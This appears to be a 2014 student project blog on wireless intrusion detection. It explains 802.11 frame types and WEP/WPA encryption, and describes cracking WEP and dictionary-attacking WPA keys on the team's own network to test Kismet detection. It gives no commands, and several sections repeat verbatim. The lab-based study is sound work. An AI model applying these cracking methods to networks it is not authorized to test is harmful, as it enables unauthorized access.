 |
| Poster of this project |
2014年3月7日星期五
2014年2月28日星期五
Difficulties encountered and solutions (trouble shooting)
In fact, we did
not run into serious trouble in this project, but we think it necessary talk
about some difficulties involved.
Being not familiar
with the software involved in the project may be the most annoying difficulty,
because we all had no experience in Linux which we had to type commands into. Fortunately,
it did not block us. We soon get used to this through attacking a wireless
network with WEP encryption.
Next we continued
to decrypt WPA network. However, this was a tough job compared to that of WEP
for the more complex encryption. Apparently, enumeration method is not feasible
here because the computation would be too much. Thus, we utilized dictionary
files to help find the key. Here we met another problem: the dictionary file
seemed useless. After a large amount of time, the computer was still working. In
this case, we inferred that the dictionary file did not match the
network under attack, so we used other dictionary files and we did not succeed
until the third one was applied.
At last we
encountered the final trouble and it nearly destroyed our project. The trouble occurred
on Kismet (the detecting software). At first we did not know how it came at all
because we had lock the detecting channel to what we want and everything seemed
correct, but we just could not figure out it. The attack was successful, but
Kismet showed no information detected and no alert file was generated. We tried
every method we could but all in vain. Eventually, the problem became clear, in
the same channel, there were also other network frames involved which should be
eliminated. So we locked detection to our access point and it made the project
go on. Kismet could perfectly detect. Also, about the alert file, it is written
every five minutes, so it cannot be seen immediately. In the last trial, we got
everything we want and we can declare the success of our project.
2014年2月26日星期三
Simple Introduction to WPA encryption
After finding the flaws of WEP, Wi-Fi Protected Access (WPA) was invented to replace it and provide higher security level.
Compared with WEP, WPA has doubled the length of IV and the Temporal Key Integrity Protocol (TKIP) could dynamically generates new key for each packet and the check algorithm has been upgraded. the "Michael" has replaced the CRC (Cyclic Redundancy Check). The following Figures show the configuration of two level of WPA keys:
1. Pairwise Key
2. Group Key
Compared with WEP, WPA has doubled the length of IV and the Temporal Key Integrity Protocol (TKIP) could dynamically generates new key for each packet and the check algorithm has been upgraded. the "Michael" has replaced the CRC (Cyclic Redundancy Check). The following Figures show the configuration of two level of WPA keys:
1. Pairwise Key
2. Group Key
Simple Introduction to WEP encryption
WEP( wired equivalent privacy) is a security algorithm for 802.11 wireless networks. It was widely used but now it is replaced by some innovative method such as WPA or WPA2 because it has been proved that WEP has some drawbacks and it is easily and instantly broken. The following Figure would show its configuration and the process of encryption and decryption:
WEP use stream cipher RC4 to encrypt the code.
XOR gates are both used in encryption and decryption.
Nowadays, WEP is still used but it could disappear someday because its security is not completely guaranteed.
Obviously, WEP compromised of IV (Initial Vector) and key.
Nowadays, WEP is still used but it could disappear someday because its security is not completely guaranteed.
2014年2月24日星期一
Introduce type of frame 2
Question: What is the data frame?
Answer: It carries protocol data with higher-level in the body of frame.
General data frame
In addition, some fields in this figure will not be used. (It depends on different particular type of data frame)
Question: What are different types of data frame?
Answer:
Question: What is the use of the address fields in data frames?
Answer:
The means of abbreviation are in "description of this project"
To DS means from BSS to DS
From DS means from DS to BSS
Question: What is the management frame?
Answer: A large component of 802.11 specification. Several and different management frames are used for providing services which are simple on the wired-network. It is easy to establish the identity of a network station on a wired network because of requirement of network connections with dragged-wires from a central location to a new workstation. For example, a personal visit can authenticate to new network connections while the new connection has been brought up.
The structure of management frame
Question: What are the subtypes of the management frame?
Answer:
a. Beacon (modify)
b. Probe (request and response)
c. Authentication (request and response)
d. Association (request and response)
e. Reassociation (request and response)
f. Disassociation (modify)
g. Deauthentication (modify)
Answer: It carries protocol data with higher-level in the body of frame.
General data frame
In addition, some fields in this figure will not be used. (It depends on different particular type of data frame)
Question: What are different types of data frame?
Answer:
Question: What is the use of the address fields in data frames?Answer:
The means of abbreviation are in "description of this project"
To DS means from BSS to DS
From DS means from DS to BSS
Question: What is the management frame?
Answer: A large component of 802.11 specification. Several and different management frames are used for providing services which are simple on the wired-network. It is easy to establish the identity of a network station on a wired network because of requirement of network connections with dragged-wires from a central location to a new workstation. For example, a personal visit can authenticate to new network connections while the new connection has been brought up.
The structure of management frame
Question: What are the subtypes of the management frame?
Answer:
a. Beacon (modify)
b. Probe (request and response)
c. Authentication (request and response)
d. Association (request and response)
e. Reassociation (request and response)
f. Disassociation (modify)
g. Deauthentication (modify)
2014年2月23日星期日
Introduce type of frame 1
Question: What is the frame?
Answer: Frame is a kind of data packet which is on the 2nd layer of the OSI model (as introducing in "description of this project"). It is defined as the transmission unit in the link layer protocol. A frame includes a link-layer header with a following packet (consist of payload and control information).
Question: How many types of frame? And what are they?
Answer: Three types. They are: data frame, control frame and management frame.
Question: What is the control frame?
Answer: Control frames can assist the data frames delivery, administer the access to wireless medium. In addition, they provide functions of MAC-layer reliability.
Type: In definition, control frames are assigned the type identifier 01.
Subtype: the subtype of the control frame
ToDS and FromDS bits: Both of them are 0 because of no sending and receiving to control frames by the distribution system
More Fragments bit: Control frames are not fragmented, 0.
Retry bit: Control frames are not queued for retransmission like management or data frames, so this bit is always 0.
Power Management bit: To indicate the power management state of sender.
More Data bit: Only being in management and data frames, so it is set to 0.
WEP bit: Control frames might not be encrypted by WEP and the WEP bit is always 0.
Question: How many subtypes of control frame are included? And what are they?
Answer: Four subtypes and they are Request to Send, Clear to Send, Acknowledgment and Power-Save Poll.
Request to Send (RST)
RTS frame is used to enhance control of the medium for large frames transmission.
Clear to Send (CST)
The CTS frame answers the RTS frame.
Acknowledgment (ACK)
ACK frame is used with any data transmission and is used for sending positive acknowledgments required by the MAC.
Power-Save Poll (PS-Poll)
When a mobile station wakes from power-saving mode, a PS-Poll frame will be transmitted to the AP for retrieving any frames buffered since in power-saving mode.
Answer: Frame is a kind of data packet which is on the 2nd layer of the OSI model (as introducing in "description of this project"). It is defined as the transmission unit in the link layer protocol. A frame includes a link-layer header with a following packet (consist of payload and control information).
Question: How many types of frame? And what are they?
Answer: Three types. They are: data frame, control frame and management frame.
Question: What is the control frame?
Answer: Control frames can assist the data frames delivery, administer the access to wireless medium. In addition, they provide functions of MAC-layer reliability.
Frame Control field in control frames
Protocol version: The protocol version is 0(It is
the only version in current)
Type: In definition, control frames are assigned the type identifier 01.
Subtype: the subtype of the control frame
ToDS and FromDS bits: Both of them are 0 because of no sending and receiving to control frames by the distribution system
More Fragments bit: Control frames are not fragmented, 0.
Retry bit: Control frames are not queued for retransmission like management or data frames, so this bit is always 0.
Power Management bit: To indicate the power management state of sender.
More Data bit: Only being in management and data frames, so it is set to 0.
WEP bit: Control frames might not be encrypted by WEP and the WEP bit is always 0.
Order bit: This bit is set to 0.
Question: How many subtypes of control frame are included? And what are they?
Answer: Four subtypes and they are Request to Send, Clear to Send, Acknowledgment and Power-Save Poll.
Request to Send (RST)
RTS frame is used to enhance control of the medium for large frames transmission.
Clear to Send (CST)
The CTS frame answers the RTS frame.
Acknowledgment (ACK)
ACK frame is used with any data transmission and is used for sending positive acknowledgments required by the MAC.
Power-Save Poll (PS-Poll)
When a mobile station wakes from power-saving mode, a PS-Poll frame will be transmitted to the AP for retrieving any frames buffered since in power-saving mode.
订阅:
博文 (Atom)